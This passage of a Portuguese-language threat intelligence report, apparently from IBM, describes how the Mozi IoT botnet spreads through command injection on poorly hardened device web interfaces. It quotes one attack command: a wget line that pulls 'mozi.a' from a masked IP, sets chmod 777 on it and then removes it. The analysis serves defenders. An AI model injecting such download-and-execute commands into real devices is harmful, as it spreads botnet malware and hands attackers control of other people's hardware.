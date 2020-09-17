Quase todos os direcionamentos de IoT observados pela IBM tentaram usar ataques CMDi para obter acesso inicial ao dispositivo. Se o endpoint alvo fosse um dispositivo IoT e suscetível a esses ataques, a carga útil era baixada e executada.

Os ataques CMDi são extremamente populares contra dispositivos de IoT por vários motivos. Primeiro, os sistemas integrados de IoT geralmente contêm uma interface web e uma interface de depuração remanescentes do desenvolvimento de firmware que podem ser exploradas. Em segundo lugar, os módulos PHP incorporados às interfaces da IoT web podem ser explorados, fornecendo recursos de execução remota a agentes maliciosos. Em terceiro lugar, as interfaces de IoT muitas vezes ficam vulneráveis quando implementadas porque os administradores não conseguem fortalecer as interfaces limpando as entradas remotas esperadas. Isso permite que os agentes da ameaça façam input de comandos de shell, como “wget”.

Nossa análise revelou que o botnet Mozi aproveitou o CMDi usando um comando shell “wget” e alterando as permissões para permitir que o agente da ameaça interagisse com o sistema afetado. Por exemplo:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

Se o host estivesse vulnerável ao CMDi, esse comando faria o download e executaria um arquivo chamado "mozi.a". A análise dessa amostra específica indica que o arquivo é executado em um microprocessador sem a arquitetura de Interlocked Pipeline Stages (MIPS). Essa é uma extensão entendida por máquinas que executam a arquitetura RISC (computador com conjunto de instruções reduzido), que é predominante em muitos dispositivos de IoT. Depois que o invasor obtiver acesso total ao dispositivo por meio do botnet, o nível do firmware poderá ser alterado e malware adicional poderá ser implantado no dispositivo.

Embora este exemplo cite um vetor bem conhecido, ele pode continuar a ser eficaz por duas razões principais. Em primeiro lugar, novas vulnerabilidades permitem a atualização constante das tentativas de invasão via CMDi, e a implementação lenta de patches pode ser explorada. Em segundo lugar, essa atividade é facilmente automatizada, permitindo que o agente da ameaça atinja uma ampla gama de dispositivos de forma rápida e com baixo custo.

A infraestrutura do botnet Mozi parece ter origem principalmente na China, representando 84% da infraestrutura observada. Esse fato está alinhado com outras pesquisas de código aberto sobre a atividade da IoT em 2020.

Abaixo está uma lista de vulnerabilidades que a IBM observou que o botnet Mozi está tentando explorar: